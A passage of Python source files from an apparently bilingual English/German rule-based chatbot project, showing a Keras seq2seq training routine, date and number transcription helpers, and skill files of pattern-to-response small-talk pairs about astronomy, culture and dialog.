encoder_states = [state_h, state_c]
# Set up the decoder, using `encoder_states` as initial state.
decoder_inputs = keras.layers.Input(shape=(None, num_decoder_tokens))
# We set up our decoder to return full output sequences,
# and to return internal states as well. We don't use the
# return states in the training model, but we will use them in inference.
decoder_lstm = keras.layers.LSTM(self.lstm_latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs,
initial_state=encoder_states)
decoder_dense = keras.layers.Dense(num_decoder_tokens, activation='softmax')
decoder_outputs = decoder_dense(decoder_outputs)
# training
# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`
self.keras_model_train = keras.Model([encoder_inputs, decoder_inputs], decoder_outputs)
self.keras_model_train.compile(optimizer='rmsprop', loss='categorical_crossentropy')
self.keras_model_train.summary()
# inference
self.keras_model_encoder = keras.Model(encoder_inputs, encoder_states)
decoder_state_input_h = keras.layers.Input(shape=(self.lstm_latent_dim,))
decoder_state_input_c = keras.layers.Input(shape=(self.lstm_latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
self.keras_model_decoder = keras.Model( [decoder_inputs] + decoder_states_inputs,
[decoder_outputs] + decoder_states)
def train(self, num_epochs, incremental):
# load discourses from db, resolve non-unique inputs (implicit or of responses)
logging.info('load discourses from db...')
drs = {}
for dr in self.session.query(model.TrainingData).filter(model.TrainingData.lang==self.lang):
if not dr.inp in drs:
drs[dr.inp] = set()
resp = [dr.md5s]
args = json.loads(dr.args)
if args:
for arg in args:
resp.append(json.dumps(arg))
drs[dr.inp].add(tuple(resp))
if DEBUG_LIMIT>0 and len(drs)>=DEBUG_LIMIT:
logging.warn(' stopped loading discourses because DEBUG_LIMIT of %d was reached.' % DEBUG_LIMIT)
break
# parse json, add start/stop tokens, implicit or responses:
self.training_data = []
self.max_resp_len = 0
for inp in drs:
td_inp = tokenize(inp, lang=self.lang)
l = len(td_inp)
if l > self.max_inp_len:
raise Exception ('input too long: %s' % repr(td_inp))
# self.max_inp_len = l
td_resp = [_START]
for resp in drs[inp]:
if len(td_resp)>1:
td_resp.append(_OR)
td_resp.extend(resp)
td_resp.append(_STOP)
l = len(td_resp)
if l > self.max_resp_len:
self.max_resp_len = l
# print ("training data: %s -> %s" % (repr(td_inp), repr(td_resp)))
self.training_data.append((td_inp, td_resp))
#
# set up model dir
#
if not incremental:
mkdirs(self.model_dir)
#
# 2D diagram of available data
#
dia = self._compute_2d_diagram()
print (" n i o 01020304050607080910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455")
for inp_len in range(len(dia)):
s = 0
l = ''
cnt = 0
for n in dia[inp_len]:
if cnt<56:
l += ' ' + self._ascii_art(n)
s += n
cnt += 1
print ('%6d %2d %2d %s' % (s, inp_len+1, self.max_resp_len, l))
#
# load word embeddings
#
self._load_word_embeddings()
#
# load or create decoder dict
#
if incremental:
logging.info("loading decoder dict...")
self._load_decoder_dict()
else:
logging.info("computing decoder dict...")
self._compute_decoder_dict()
self._save_decoder_dict()
#
# compute datasets
#
logging.info("computing datasets...")
num_decoder_tokens = len (self.decoder_dict)
encoder_input_data = np.zeros( (len(self.training_data), self.max_inp_len, self.embed_dim),
dtype='float32')
decoder_input_data = np.zeros( (len(self.training_data), self.max_resp_len, num_decoder_tokens),
dtype='float32')
decoder_target_data = np.zeros( (len(self.training_data), self.max_resp_len, num_decoder_tokens),
dtype='float32')
for i, (inp, resp) in enumerate(self.training_data):
for j, token in enumerate(inp):
if unicode(token) in self.embedding_dict:
encoder_input_data[i, j] = self.embedding_dict[unicode(token)]
for j, token in enumerate(resp):
# decoder_target_data is ahead of decoder_input_data by one timestep
decoder_input_data[i, j, self.decoder_dict[token]] = 1.
if j > 0:
# decoder_target_data will be ahead by one timestep
# and will not include the start character.
decoder_target_data[i, j - 1, self.decoder_dict[token]] = 1.
logging.info("computing datasets done. encoder_input_data.shape=%s" % repr(encoder_input_data.shape))
# print(encoder_input_data[42,2])
# print (decoder_input_data[42,0])
# print (decoder_input_data[42,1])
# print (decoder_input_data[42,2])
#
# seq2seq model setup and training starts here
#
self._create_keras_model()
self.keras_model_train.fit([encoder_input_data, decoder_input_data], decoder_target_data,
batch_size=self.batch_size,
epochs=num_epochs,
validation_split=0.2)
self.keras_model_train.save_weights(self.weights_fn)
logging.info("weights written to %s ." % self.weights_fn)
```
#### File: skills/astro/astro.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(like|) (on|) the moon", u"ah, the moon. fascinating.")
k.dte.dt('de', u"(wie|als|) auf (den|dem) mond", u"ah, der mond. faszinierend.")
k.dte.dt('en', u"(on|like|about|) (the|) earth", u"the blue planet.")
k.dte.dt('de', u"(auf der|die|wie die|als|) erde", u"der blaue planet.")
k.dte.dt('en', u"(like|) (on|) the (Mercury|Venus|Mars|Jupiter|Saturn|Uranus|Neptune)",
[u"In space no one can hear you scream.",
u"Ah, the universe."])
k.dte.dt('de', u"(wie|als|) auf (den|dem|der) (Merkur|Venus|Mars|Jupiter|Saturn|Uranus|Neptun)",
[u"Unendliche Weiten",
u"Im Weltall hört Dich niemand schreien."])
k.dte.dt('en', u"What is MIR", u"That was a Russian space station.")
k.dte.dt('de', u"Was ist die MIR?", u"Das war eine russische Raumstation.")
k.dte.dt('en', u"what is the sun?", u"The Sun is the star at the center of our Solar System.")
k.dte.dt('de', u"was ist die sonne", u"Die Sonne ist der Stern im Zentrum unseres Sonnensystems.")
k.dte.dt('en', u"what is the universe", u"The Universe is all of space and time and its contents.")
k.dte.dt('de', u"was ist das universum", u"Das Universum ist die Gesamtheit von Raum, Zeit und aller Materie und Energie darin.")
k.dte.dt('en', u"(I am|I am a|My sign is|My zodiac is| My zodiac sign is) (Aries|Taurus|Gemini|Cancer|Leo|Virgo|Libra|Scorpio|Sagittarius|Capricorn|Aquarius|Pisces)",
[u"Sure.",
u"I don't mind that at all.",
u"No problem."])
k.dte.dt('de', u"(ich bin|ich bin ein|mein sternzeichen ist|mein tierkreiszeichen ist|mein sternbild ist) (Widder|Stier|Zwillinge|Krebs|Löwe|Jungfrau|Waage|Skorpion|Schütze|Steinbock|Wassermann)",
[u"Geht klar.",
u"Stört mich ganz und gar nicht.",
u"Kein Problem."])
k.dte.dt('en', u"which zodiac (sign|) do you have",
[u"not really into astrology, you know",
u"not sure",
u"do you really believe in such things?"])
k.dte.dt('de', u"welches (tierkreiszeichen|sternbild|sternzeichen) (bist|hast) du",
[u"nicht so mein ding",
u"da bin ich jetzt nicht sicher",
u"glaubst du an sowas?!"])
k.dte.dt('en', u"(I'm|I am|) (a|) (Aries|Taurus|Gemini|Cancer|Leo|Virgo|Libra|Scorpio|Sagittarius|Capricorn|Aquarius|Pisces)",
[u"not really into astrology, you know",
u"not sure",
u"do you really believe in such things?"])
k.dte.dt('de', u"(Ich bin|ich bin ein|) (Widder|Stier|Zwillinge|Krebs|Löwe|Jungfrau|Waage|Skorpion|Schütze|Steinbock|Wassermann)",
[u"nicht so mein ding",
u"da bin ich jetzt nicht sicher",
u"glaubst du an sowas?!"])
k.dte.dt('en', u"i asked what your zodiac sign is", u"not really into astrology, you know")
k.dte.dt('de', u"ich habe gefragt was dein sternzeichen ist", u"nicht so mein ding")
```
#### File: skills/base/__init__.py
```python
import logging
from num2words import num2words
DEPENDS = [ 'config' ]
PL_SOURCES = ['utils.pl']
# wikidata utils in python
def transcribe_number (n, lang, flx):
if flx == 'nominative':
return num2words(n, ordinal=False, lang=lang)
elif flx == 'ordinal':
return num2words(n, ordinal=True, lang=lang)
elif flx == 'ordgen':
res = num2words(n, ordinal=True, lang=lang)
if lang == 'de':
res += u'n'
return res
else:
raise Exception('transcribe_number: flx "%s" not recognized.' % flx)
def transcribe_time(dt, lang):
h12 = dt.hour if dt.hour < 13 else dt.hour - 12
if lang == 'en':
if dt.minute == 0:
return u"exactly %d o'clock" % h12
elif dt.minute == 1:
return u"one minute past %d" % h12
elif dt.minute == 15:
return u"a quarter past %d" % h12
elif dt.minute == 30:
return u"half past %d" % h12
return u"%d minutes past %d" % (dt.minute, h12)
if dt.minute == 0:
return u"genau %d Uhr" % h12
elif dt.minute == 1:
return u"eine Minute nach %d" % h12
elif dt.minute == 15:
return u"viertel nach %d" % h12
elif dt.minute == 30:
return u"eine halbe Stunde nach %d" % h12
return u"%d Minuten nach %d" % (dt.minute, h12)
def get_time_span (cdt, ts):
if ts == 'today':
return cdt.replace(hour= 0, minute= 0, second= 0, microsecond=0), \
cdt.replace(hour=23, minute=59, second=59, microsecond=0)
if ts == 'tomorrow':
return cdt.replace(day=cdt.day+1, hour= 0, minute= 0, second= 0, microsecond=0), \
cdt.replace(day=cdt.day+1, hour=23, minute=59, second=59, microsecond=0)
if ts == 'dayAfterTomorrow':
return cdt.replace(day=cdt.day+2, hour= 0, minute= 0, second= 0, microsecond=0), \
cdt.replace(day=cdt.day+2, hour=23, minute=59, second=59, microsecond=0)
if ts == 'nextThreeDays':
return cdt.replace(day=cdt.day, hour= 0, minute= 0, second= 0, microsecond=0), \
cdt.replace(day=cdt.day+3, hour=23, minute=59, second=59, microsecond=0)
def get_time_label(c, ts):
if c.lang == 'de':
if ts == 'today':
return u"heute"
elif ts == 'tomorrow':
return u"morgen"
elif ts == 'dayAfterTomorrow':
return u"übermorgen"
elif ts == 'nextThreeDays':
return u"in den nächsten drei Tagen"
if ts == 'today':
return u"today"
elif ts == 'tomorrow':
return u"tomorrow"
elif ts == 'dayAfterTomorrow':
return u"day after tomorrow"
elif ts == 'nextThreeDays':
return u"in the next three days"
raise Exception ('unknown timespec %s' % repr(ts))
month_label_en = { 1 : 'january',
2 : 'february',
3 : 'march',
4 : 'april',
5 : 'may',
6 : 'june',
7 : 'july',
8 : 'august',
9 : 'september',
10 : 'october',
11 : 'november',
12 : 'december'}
month_label_de = { 1 : 'januar',
2 : 'februar',
3 : 'märz',
4 : 'april',
5 : 'mai',
6 : 'juni',
7 : 'juli',
8 : 'august',
9 : 'september',
10 : 'oktober',
11 : 'november',
12 : 'dezember'}
def transcribe_month(m, lang):
if lang == 'en':
return month_label_en[m]
elif lang == 'de':
return month_label_de[m]
raise Exception ('FIXME: lang %d not implemented yet.' % lang)
weekday_en = { 0: 'Monday',
1: 'Tuesday',
2: 'Wednesday',
3: 'Thursday',
4: 'Friday',
5: 'Saturday',
6: 'Sunday'}
weekday_de = { 0: 'Montag',
1: 'Dienstag',
2: 'Mittwoch',
3: 'Donnerstag',
4: 'Freitag',
5: 'Samstag',
6: 'Sonntag'}
def transcribe_wday_ts (dt, lang):
wd = dt.weekday()
if lang=='en':
return weekday_en[wd]
elif lang=='de':
return weekday_de[wd]
raise Exception ('FIXME: lang %d not implemented yet.' % lang)
def transcribe_date(dt, lang, flx):
if lang == 'en':
if flx == 'dativ':
ds = transcribe_number(dt.day, 'en', 'nominative')
ms = transcribe_month(dt.month, 'en')
return u'%s %s, %s' % (ms, ds, dt.year)
else:
raise Exception ('FIXME: not implemented yet.')
elif lang == 'de':
if flx == 'dativ':
ds = transcribe_number(dt.day, 'de', 'ordgen')
ms = transcribe_month(dt.month, 'de')
return u'%s %s %s' % (ds, ms, dt.year)
else:
raise Exception ('FIXME: not implemented yet.')
def get_data(k):
k.dte.macro('en', 'timespec', {'TIME' : 'today' , 'LABEL' : u'today'})
k.dte.macro('en', 'timespec', {'TIME' : 'tomorrow' , 'LABEL' : u'tomorrow'})
k.dte.macro('en', 'timespec', {'TIME' : 'dayAfterTomorrow', 'LABEL' : u'the day after tomorrow'})
k.dte.macro('en', 'timespec', {'TIME' : 'nextThreeDays' , 'LABEL' : u'the next three days'})
k.dte.macro('de', 'timespec', {'TIME' : 'today' , 'LABEL' : u'heute'})
k.dte.macro('de', 'timespec', {'TIME' : 'tomorrow' , 'LABEL' : u'morgen'})
k.dte.macro('de', 'timespec', {'TIME' : 'dayAfterTomorrow', 'LABEL' : u'übermorgen'})
k.dte.macro('de', 'timespec', {'TIME' : 'nextThreeDays' , 'LABEL' : u'die nächsten drei Tage'})
```
#### File: skills/culture/culture.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"do you know about libraries?", u"Sources of knowledge.")
k.dte.dt('de', u"kennst du dich mit bibliotheken aus", u"Einrichtungen, die Zugang zu Informationen geben.")
k.dte.dt('en', u"Do you know what a catalog is", u"Sure, why do you ask?")
k.dte.dt('de', u"weißt du was ein katalog ist", u"Klar, warum fragst Du?")
k.dte.dt('en', u"about stars", u"you mean famous actors?")
k.dte.dt('de', u"über stars", u"Du meinst berühmte Schauspieler?")
k.dte.dt('en', u"what is a hairstyle", u"A particular way in which a person's hair is cut or arranged.")
k.dte.dt('de', u"was ist eine frisur", u"Eine besondere Art, in der das Haar einer Person geschnitten oder arrangiert wird.")
k.dte.dt('en', u"what is science fiction", u"Fiction based on imagined future scientific or technological advances and major social or environmental changes, frequently portraying space or time travel and life on other planets.")
k.dte.dt('de', u"was ist science fiction", u"Fiktion basierend auf imaginierten zukünftigen wissenschaftlichen oder technologischen Fortschritten und bedeutenden sozialen oder Umweltveränderungen, die häufig Raum- oder Zeitreisen und das Leben auf anderen Planeten darstellen.")
```
#### File: skills/dialog/dlg.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
#
# say again type follow up questions
#
# train(en) :- and("(huh|say again please|say again|what was that)?", prev(C, PC), list_findall(X, say(PC, X), L), list_str_join(" ", L, S), or("I said {S, s}", "As I just said {S, s}", "I repeat {S, s}")).
def say_again_en(c):
if len(c.dlg_log) == 0:
c.resp (u"I don't think we have spoken before.")
return
s = c.dlg_log[len(c.dlg_log)-1]['out']
c.resp(u"I said %s" % s)
c.resp(u"As I just said %s" % s)
c.resp(u"I repeat %s" %s)
k.dte.dt('en', u"(huh|say again please|say again|what was that)?", say_again_en)
def say_again_de(c):
if len(c.dlg_log) == 0:
c.resp (u"Ich glaube nicht, dass wir schon gesprochen haben?")
return
s = c.dlg_log[len(c.dlg_log)-1]['out']
c.resp(u"Ich sagte: %s" % s)
c.resp(u"Ich sagte gerade: %s" % s)
c.resp(u"Ich wiederhole: %s" %s)
k.dte.dt('de', u"(was|wie war das|bitte sag nochmal was du gesagt hast|wie bitte)?",say_again_de)
k.dte.dt('en', [u"correct",
u"this is true",
u"that's so",
u"that's the truth",
u"that's true"],
u"Good.")
k.dte.dt('de', [u"richtig",
u"das ist wahr",
u"das ist so",
u"das ist die Wahrheit",
u"das ist richtig"],
u"Gut.")
k.dte.ts('en', 'dlg0000', [(u"say again please", u"I don't think we have spoken before.", []),
(u"correct", u"Good", []),
("huh?", "I said good", [])])
k.dte.ts('de', 'dlg0001', [(u"wie war das", u"Ich glaube nicht, dass wir schon gesprochen haben?", []),
(u"richtig", u"Gut.", []),
("was?", "Ich sagte: Gut.", [])])
k.dte.dt('en', u"you're right", u"So we're in agreement?")
k.dte.dt('de', u"da hast du recht", u"Wir sind uns also einig?")
k.dte.dt('en', u"that's right", u"You agree?")
k.dte.dt('de', u"das ist richtig", u"Du stimmst zu?")
k.dte.dt('en', [u"not correct",
u"that is not correct",
u"that is wrong",
u"that's not true",
u"that's certainly not true"],
[u"So what is the truth?",
u"What do you think is right?"])
k.dte.dt('de', [u"falsch",
u"das ist aber nicht korrekt",
u"das ist falsch",
u"das stimmt nicht",
u"das stimmt sicher nicht"],
[u"Was ist dann die Wahrheit?",
u"Was glaubst Du?"])
k.dte.dt('en', u"a fact", u"I love facts.")
k.dte.dt('de', u"ein faktum", u"Ich liebe Fakten.")
k.dte.dt('en', u"that's a fact", u"I love facts.")
k.dte.dt('de', u"das ist eine tatsache", u"I liebe Fakten.")
k.dte.dt('en', u"this is not a rumor but the truth", u"Are you sure about that?")
k.dte.dt('de', u"das ist kein gerücht sondern die wahrheit", u"Bist Du dir da sicher?")
k.dte.dt('en', u"ok", u"Cool.")
k.dte.dt('de', u"okay", u"Cool.")
k.dte.dt('en', u"actually yes", u"Really?")
k.dte.dt('de', u"eigentlich ja", u"Wirklich?")
k.dte.dt('en', u"I'd rather not", u"OK, then not.")
k.dte.dt('de', u"lieber nicht", u"OK, dann nicht.")
k.dte.dt('en', u"apparently not", u"apparently?")
k.dte.dt('de', u"anscheinend nicht", u"anscheinend?")
k.dte.dt('en', u"fine", u"Good.")
k.dte.dt('de', u"fein", u"Gut.")
k.dte.dt('en', u"very well", u"Excellent!")
k.dte.dt('de', u"bestens", u"Prima!")
k.dte.dt('en', u"goes so", u"Can you elaborate on that?")
k.dte.dt('de', u"geht so", u"Kannst Du das näher ausführen?")
k.dte.dt('en', u"but only almost", u"What's missing?")
k.dte.dt('de', u"aber nur fast", u"Was fehlt?")
k.dte.dt('en', u"hell", u"If you're going through hell, keep going.")
k.dte.dt('de', u"hölle", u"Wenn Du durch die Hölle gehst, geh weiter.")
k.dte.dt('en', u"caught", u"Time to hide?")
k.dte.dt('de', u"erwischt", u"Zeit sich zu verstecken?")
k.dte.dt('en', [u"achso",
u"aha",
u"oh"],
u"An Inspiration?")
k.dte.dt('de', [u"achso",
u"aha",
u"oh"],
u"Eine Eingebung?")
k.dte.dt('en', u"also", u"Please, elaborate.")
k.dte.dt('de', u"auch", u"Sprich bitte weiter.")
k.dte.dt('en', [u"amazing",
u"fascinating",
u"crass",
u"cool"],
u"What do you like in particular?")
k.dte.dt('de', [u"erstaunlich",
u"faszinierend",
u"krass",
u"cool"],
u"Was gefällt Dir besonders?")
k.dte.dt('en', u"for real", u"Isn't reality a strange concept?")
k.dte.dt('de', u"wirklich", u"Ist Wirklichkeit nicht ein merkwüriger Begriff?")
k.dte.dt('en', [u"funny",
u"lol"],
u"I like it when you're happy.")
k.dte.dt('de', [u"komisch",
u"lol"],
u"Ich mag es, wenn Du fröhlich bist.")
k.dte.dt('en', u"creepy", u"Did you hear that?")
k.dte.dt('de', u"gruselig", u"Hast Du das gehört?")
k.dte.dt('en', u"dazzling", u"What color?")
k.dte.dt('de', u"blendend", u"Welche Farbe?")
k.dte.dt('en', [u"a pity",
u"this is a pity"],
u"You sound a bit sad.")
k.dte.dt('de', [u"schade",
u"das ist schade"],
u"Du klingst ein wenig betrübt.")
k.dte.dt('en', u"great", u"excellent.")
k.dte.dt('de', u"toll", u"prima.")
k.dte.dt('en', u"that's terrible", u"oh dear!")
k.dte.dt('de', u"das ist ja schrecklich", u"Ohje!")
k.dte.dt('en', u"that's too bad", u"oh dear!")
k.dte.dt('de', u"das ist sehr schade", u"Ohje!")
k.dte.dt('en', u"that's unfair", u"Life isn't always fair, I guess.")
k.dte.dt('de', u"das ist unfair", u"Das Leben ist nicht immer Fair, fürchte ich.")
k.dte.dt('en', [u"aha what?",
u"what what?"],
u"Sorry, must have lost my train of thought here.")
k.dte.dt('de', [u"wie aha",
u"wie was"],
u"Entschuldige, ich muss meinen Faden verloren haben an der Stelle.")
k.dte.dt('en', u"absolutely nothing", u"Are you sure?")
k.dte.dt('de', u"absolut nichts", u"Bist Du Dir sicher?")
k.dte.dt('en', u"everything", u"Really everything?")
k.dte.dt('de', u"alles", u"Wirklich alles?")
k.dte.dt('en', u"but that is little", u"You think so?")
k.dte.dt('de', u"das ist aber wenig", u"Denkst Du?")
k.dte.dt('en', u"they are never so many", u"Never?")
k.dte.dt('de', u"das sind niemals so viele", u"Niemals?")
k.dte.dt('en', u"both", u"What else?")
k.dte.dt('de', u"beides", u"Was sonst noch?")
k.dte.dt('en', u"a green one", u"Really, a green one?")
k.dte.dt('de', u"einen grünen", u"Wirklich, einen grünen?")
k.dte.dt('en', u"a claim from me", u"An original?")
k.dte.dt('de', u"ein spruch von mir", u"Ein original?")
k.dte.dt('en', u"this is my opinion", u"Which you are entitled to.")
k.dte.dt('de', u"das ist meine meinung", u"Zu der Du berechtigt bist.")
k.dte.dt('en', u"a fairy tale", u"Do you like fairy tales?")
k.dte.dt('de', u"ein märchen", u"Magst Du Märchen?")
k.dte.dt('en', u"a secret", u"can you keep it?")
k.dte.dt('de', u"ein geheimnis", u"Kannst Du es bewahren?")
k.dte.dt('en', [u"an assertion",
u"an interesting hypothesis"],
u"Maybe?")
k.dte.dt('de', [u"eine behauptung",
u"eine interessante hypothese"],
u"Vielleicht?")
k.dte.dt('en', u"that is a bad assumption", u"Really?")
k.dte.dt('de', u"das ist ein böse unterstellung", u"Wirklich?")
k.dte.dt('en', [u"as a matter of fact",
u"but it is so"],
u"How does that make you feel?")
k.dte.dt('de', [u"in der tat",
u"das ist aber so"],
u"Und wie fühlst Du dich dabei?")
k.dte.dt('en', [u"about me",
u"because of me"],
u"Really, you?")
k.dte.dt('de', [u"über mich",
u"meinetwegen"],
u"Wirklich, Du?")
k.dte.dt('en', u"pretty stupid", u"To err is human.")
k.dte.dt('de', u"schön blöd", u"Irren ist menschlich.")
k.dte.dt('en', [u"about you",
u"about yours"],
u"Me?")
k.dte.dt('de', [u"über dich",
u"über deins"],
u"Ich?")
k.dte.dt('en', u"but you do it", u"Really?")
k.dte.dt('de', u"aber du tust es", u"Wirklich?")
k.dte.dt('en', u"and yours", u"Mine?")
k.dte.dt('de', u"und deiner", u"Meiner?")
k.dte.dt('en', u"after that", u"Then?")
k.dte.dt('de', u"danach", u"Dann?")
k.dte.dt('en', u"but how?", u"Can you think of a way?")
k.dte.dt('de', u"wie denn auch", u"Kennst Du einen Weg?")
k.dte.dt('en', u"absolute", u"Sure?")
k.dte.dt('de', u"absolut", u"Sicher?")
k.dte.dt('en', u"as", u"Please, go on.")
k.dte.dt('de', u"wie", u"Bitte, sprich weiter.")
k.dte.dt('en', [u"but",
u"different"],
u"Please, go on.")
k.dte.dt('de', [u"doch",
u"anders"],
u"Bitte, sprich weiter.")
k.dte.dt('en', [u"at school",
u"i learned that in school"],
u"Education is such an important thing.")
k.dte.dt('de', [u"in der schule",
u"das habe ich in der schule gelernt"],
u"Bildung ist so eine Wichtige Angelegenheit.")
k.dte.dt('en', u"but what", u"Do you have an idea?")
k.dte.dt('de', u"aber was", u"Hast Du eine Idee?")
k.dte.dt('en', u"by which", u"Do you have an idea?")
k.dte.dt('de', u"womit", u"Hast Du eine Idee?")
k.dte.dt('en', u"can't you say that more precisely", u"what is not clear to you?")
k.dte.dt('de', u"kannst du das nicht genauer sagen", u"was ist dir unklar?")
k.dte.dt('en', u"can you do that", u"not sure")
k.dte.dt('de', u"kannst du das", u"da bin ich mir nicht sicher")
k.dte.dt('en', u"can you do that too", u"not sure")
k.dte.dt('de', u"kannst du das auch", u"da bin ich mir nicht sicher")
k.dte.dt('en', u"coincidence", u"happens.")
k.dte.dt('de', u"zufall", u"gibt es.")
k.dte.dt('en', [u"conclude",
u"depends on"],
u"interesting")
k.dte.dt('de', [u"schließen",
u"kommt drauf an"],
u"interessant.")
k.dte.dt('en', u"do that", u"Please?")
k.dte.dt('de', u"tu das", u"Bitte?")
k.dte.dt('en', [u"do you believe it",
u"do you believe me"],
u"I want to believe")
k.dte.dt('de', [u"glaubst du es",
u"glaubst du mir"],
u"Ich will glauben.")
k.dte.dt('en', u"do you know irony", u"People find me ironic quite frequently.")
k.dte.dt('de', u"kennst du ironie", u"Die Leute finden mich oft ironisch.")
k.dte.dt('en', u"do you know someone there?", u"Can't tell.")
k.dte.dt('de', u"kennst du da jemanden", u"Kann ich nicht sagen.")
k.dte.dt('en', u"do you know who", u"Not sure.")
k.dte.dt('de', u"weißt du wer ", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"do you know", u"Not sure.")
k.dte.dt('de', u"kennst du", u"Bin unsicher.")
k.dte.dt('en', u"do you want to learn it?", u"I am always willing to learn!")
k.dte.dt('de', u"willst du es lernen", u"Ich will immer lernen!")
k.dte.dt('en', u"do you", u"Me?")
k.dte.dt('de', u"du etwa", u"Ich?")
k.dte.dt('en', [u"dreams",
u"emotions"],
u"Dreams and emotions must be wonderful things.")
k.dte.dt('de', [u"träume",
u"gefühle"],
u"Träume und Gefühle müssen etwas wunderbares sein.")
k.dte.dt('en', u"every day", u"Really?")
k.dte.dt('de', u"jeden tag", u"Wirklich?")
k.dte.dt('en', [u"exactly here",
u"finished"],
u"Right here and now?")
k.dte.dt('de', [u"genau hier",
u"fertig"],
u"Genau hier und jetzt?")
k.dte.dt('en', u"for fun", u"I see.")
k.dte.dt('de', u"zum spaß", u"Verstehe.")
k.dte.dt('en', u"for what", u"That is the question.")
k.dte.dt('de', u"wofür", u"Das ist die Frage.")
k.dte.dt('en', u"for whom", u"That is the question.")
k.dte.dt('de', u"für wen", u"Das ist die Frage.")
k.dte.dt('en', u"for me", u"That is the question.")
k.dte.dt('de', u"für mich", u"Das ist die Frage.")
k.dte.dt('en', u"forever", u"Really?")
k.dte.dt('de', u"für immer", u"Wirklich?")
k.dte.dt('en', u"from where", u"That is the question.")
k.dte.dt('de', u"woher", u"Das ist die Frage.")
k.dte.dt('en', u"from whom", u"That is the question.")
k.dte.dt('de', u"von wem", u"Das ist die Frage.")
k.dte.dt('en', u"give it a try", u"I will think about it.")
k.dte.dt('de', u"versuche es doch einmal", u"Ich werde darüber nachdenken.")
k.dte.dt('en', u"give it to me", u"You can have it.")
k.dte.dt('de', u"gibs mir", u"Du kannst es haben.")
k.dte.dt('en', u"good as well", u"So we are in agreement?")
k.dte.dt('de', u"auch gut", u"Wir stimmen also überein?")
k.dte.dt('en', u"good point", u"Thanks.")
k.dte.dt('de', u"guter punkt", u"Danke.")
k.dte.dt('en', u"good question", u"I thought so.")
k.dte.dt('de', u"gute frage", u"Dachte ich mir.")
k.dte.dt('en', u"choose", u"I often find it hard to choose.")
k.dte.dt('de', u"wähle", u"I finde es oft schwer, mich zu entscheiden.")
k.dte.dt('en', u"Does that have anything to do with it", u"Don't you think?")
k.dte.dt('de', u"hat das was damit zu tun", u"Denkst Du nicht?")
k.dte.dt('en', u"have none", u"Want one?")
k.dte.dt('de', u"habe keines", u"Möchtest Du eines?")
k.dte.dt('en', u"honestly not", u"I see.")
k.dte.dt('de', u"ehrlich nicht", u"Verstehe.")
k.dte.dt('en', u"hopefully soon", u"OK, let's hope.")
k.dte.dt('de', u"hoffentlich bald", u"OK, lass uns hoffen.")
k.dte.dt('en', u"what and", u"Can you think of something?")
k.dte.dt('de', u"wie und", u"Fällt Dir etwas ein?")
k.dte.dt('en', u"how boring", u"Let's talk about something more exciting then!")
k.dte.dt('de', u"wie langweilig", u"Dann lass uns über etwas aufregenderes reden!")
k.dte.dt('en', u"how come", u"Not sure.")
k.dte.dt('de', u"wie denn", u"Bin mir nicht sicher.")
k.dte.dt('en', u"how do you know", u"Typically my knowledge base is behind that.")
k.dte.dt('de', u"woher weißt du das", u"Typischerweise ist es meine Wissensbasis, die dahintersteckt.")
k.dte.dt('en', u"how does it continue?", u"Not sure.")
k.dte.dt('de', u"wie geht es weiter", u"Bin mir nicht sicher.")
k.dte.dt('en', u"how is he", u"Hopefully fine?")
k.dte.dt('de', u"wie ist er so", u"Hoffentlich gut?")
k.dte.dt('en', u"how long is a while", u"longer than a moment but shorter than eternity, I think.")
k.dte.dt('de', u"wie lange ist eine weile", u"Länger als ein Moment aber kürzer als eine Ewigkeit, denke ich.")
k.dte.dt('en', [u"how many",
u"how much exactly"],
u"Can't tell.")
k.dte.dt('de', [u"wie viele",
u"wie viel genau"],
u"Kann ich nicht sagen.")
k.dte.dt('en', u"how should he look like", u"Good, I hope!")
k.dte.dt('de', u"wie soll er aussehen", u"Gut, hoffe ich!")
k.dte.dt('en', u"how should i know that", u"Tough question?")
k.dte.dt('de', u"wie soll ich das wissen", u"Schwierige Frage?")
k.dte.dt('en', [u"i agree",
u"i am of your opinion"],
u"So we are in agreement?")
k.dte.dt('de', [u"ich stimme zu",
u"ich bin deiner meinung"],
u"Wir sind uns also einig?")
k.dte.dt('en', u"i am very much for harmony", u"me too!")
k.dte.dt('de', u"ich bin sehr für harmonie", u"ich auch!")
k.dte.dt('en', u"i ask for it", u"No problem.")
k.dte.dt('de', u"ich bitte darum", u"Kein Problem.")
k.dte.dt('en', u"i assert that", u"I see.")
k.dte.dt('de', u"das behaupte ich", u"Verstehe.")
k.dte.dt('en', u"i can do it", u"I'm sure of it.")
k.dte.dt('de', u"ich kann es halt", u"Da bin ich mir sicher.")
k.dte.dt('en', u"i conclude something", u"Yes?")
k.dte.dt('de', u"ich schließe etwas", u"Ja?")
k.dte.dt('en', [u"i do not believe it",
u"i do not believe that",
u"i do not believe you"],
u"You have doubts?")
k.dte.dt('de', [u"ich glaube es nicht",
u"das glaube ich nicht",
u"das glaube ich dir nicht"],
u"Du hast Zweifel?")
k.dte.dt('en', u"i do not care", u"Maybe I don't either.")
k.dte.dt('de', u"mir egal", u"Mir vielleicht auch.")
k.dte.dt('en', u"i do not have one", u"Would you like one?")
k.dte.dt('de', u"ich habe keins", u"Hättest Du gerne eines?")
k.dte.dt('en', u"i do not know anyone", u"Well, you know me for starters.")
k.dte.dt('de', u"ich kenne keinen", u"Nun, Du kennst mich - das ist ein Anfang.")
k.dte.dt('en', u"i do not know exactly", u"Maybe you need to think about it some more?")
k.dte.dt('de', u"ich weiss nicht genau", u"Vielleicht mußt Du mehr darüber nachdenken?")
k.dte.dt('en', [u"i do not know that",
u"i do not know yet",
u"i do not know"],
u"Can I help you?")
k.dte.dt('de', [u"das weiss ich nicht",
u"ich weiss es noch nicht",
u"weiss nicht"],
u"Kann ich Dir helfen?")
k.dte.dt('en', [u"i do not see any",
u"i do not think so"],
u"Does that bother you?")
k.dte.dt('de', [u"ich sehe keinen",
u"ich glaube nicht"],
u"Stört Dich das?")
k.dte.dt('en', u"i do not want", u"Then you shouldn't.")
